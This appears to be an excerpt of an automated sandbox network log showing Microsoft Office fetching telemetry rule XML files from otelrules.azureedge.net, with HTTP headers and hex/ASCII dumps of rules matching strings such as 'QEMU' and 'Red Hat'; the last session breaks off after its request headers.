                                                                                                                                                                                                        2024-12-02 06:39:08 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        75192.168.2.84987913.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:07 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:08 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                        x-ms-request-id: 4e3832d9-101e-005a-31c5-43882b000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063908Z-174f7845968pf68xhC1EWRr4h8000000146g00000000d6c5
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:08 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        76192.168.2.84988113.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:08 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:09 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 502
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                        x-ms-request-id: 4680a0b7-201e-003c-6bc7-4330f9000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063909Z-174f7845968vqt9xhC1EWRgten0000001470000000000fvb
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:09 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        77192.168.2.84988213.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:09 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:10 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:10 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 407
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                        x-ms-request-id: b6cdcd34-001e-0014-02c7-435151000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063910Z-174f7845968xlwnmhC1EWR0sv800000013u000000000bfy0
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:10 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        78192.168.2.84988313.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:09 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:10 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 474
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                        x-ms-request-id: 1fbe2e95-401e-0083-4bb4-43075c000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063910Z-174f7845968frfdmhC1EWRxxbw000000141g00000000a1ck
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:10 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        79192.168.2.84988413.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:10 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:10 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 408
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                        x-ms-request-id: 15a89213-901e-0083-02aa-42bb55000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063910Z-174f7845968px8v7hC1EWR08ng000000147g00000000cg8t
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:10 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        80192.168.2.84988513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:10 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:10 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:10 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 469
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                        x-ms-request-id: ccb4b789-101e-0028-02af-428f64000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063910Z-174f7845968vqt9xhC1EWRgten000000144g0000000048pp
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:10 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        81192.168.2.84988613.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:11 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:11 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 416
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                        x-ms-request-id: 3111ff0c-301e-001f-4971-40aa3a000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063911Z-174f7845968xlwnmhC1EWR0sv800000013t000000000dk3z
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:11 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        82192.168.2.84988913.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:12 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:12 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 475
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BBA740822"
                                                                                                                                                                                                        x-ms-request-id: a0ab9ddc-d01e-00ad-54a3-43e942000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063912Z-174f784596886s2bhC1EWR743w000000145g0000000021xy
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:12 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        83192.168.2.84988713.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:12 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:12 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                                        x-ms-request-id: 1e6e7a31-701e-0098-6aa5-43395f000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063912Z-174f7845968jrjrxhC1EWRmmrs00000014800000000032nk
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:12 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        84192.168.2.84988813.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:12 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
